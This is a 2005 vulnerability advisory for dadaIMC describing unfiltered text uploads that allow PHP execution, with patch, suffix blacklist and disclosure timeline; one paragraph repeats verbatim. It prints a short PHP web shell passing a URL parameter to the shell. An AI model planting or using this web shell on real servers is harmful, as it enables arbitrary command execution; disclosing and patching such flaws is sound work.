Malicious text file upload (UPDATED 2005-05-24)

Background

dadaIMC is content management software for the development of an Independent Media Center site.

Description

dadaIMC allows various media files to be uploaded, either directly to the Media Gallery, or in conjunction with a Feature or Newswire Article post. If the file being uploaded is of a MIME type which the web browser will execute as a text file, an individual may construct a text file containing PHP or other code enabling execution of normally restricted commands.

Because of the possibility of such attacks, file uploads to the Media Gallery are inspected for their MIME type, and all text files are run through a function to strip out potentially malicious code. Files uploaded with Newswire Articles, Features, or Comments, however, are not run through the same cleansing routine.

Because of the possibility of such attacks, file uploads to the Media Gallery are inspected for their MIME type, and all text files are run through a function to strip out potentially malicious code. Files uploaded with Newswire Articles, Features, or Comments, however, are not run through the same cleansing routine. This oversight allows an attacker the ability to upload a properly-constructed text file which can then be executed in the browser.

For example, a text file containing

<?php
$cmd = $_GET['cmd'];
passthru("$cmd", $return);
?>

would allow an attacker to pass through any shell command by simply appending it to the search args when hitting the display page in a browser.

Analysis

Exploitation allows for an attacker to execute any possible shell command available to the user under which the web server is running. This could potentially include directory listings, file deletion or manipulation, or possibly full root access to the shell.

Detection

All versions of dadaIMC prior to .99.2 are vulnerable, and should be patched or updated immediately.

Workaround

The patch package supplied below contains new versions of imc_Article.inc and imc_Media.inc. Both files have version numbers ending in ".patched" and reflect the date 2005-05-05.

These new files including all previous patches, and will now restrict file uploads based on file suffix for greater protection against mime-type spoofing. Currently blacklisted suffixes are: 'asp','cgi','js','php','phtml','pl','py','rb','rbx'.

As a more restrictive alternative, you may uncomment code in each file to switch to a WHITELIST method, only permitting suffixes matching your whitelist. Comments are included in each file with appropriate instructions for modification.

Patch

File patch (fileuploadpatch.zip)

Timeline

2005-03-01 Vulnerability Report to Vendor
2005-03-02 Vendor offers patch
2005-04-28 Patch updated
2005-05-05 Added blacklist/whitelist functionality

Credit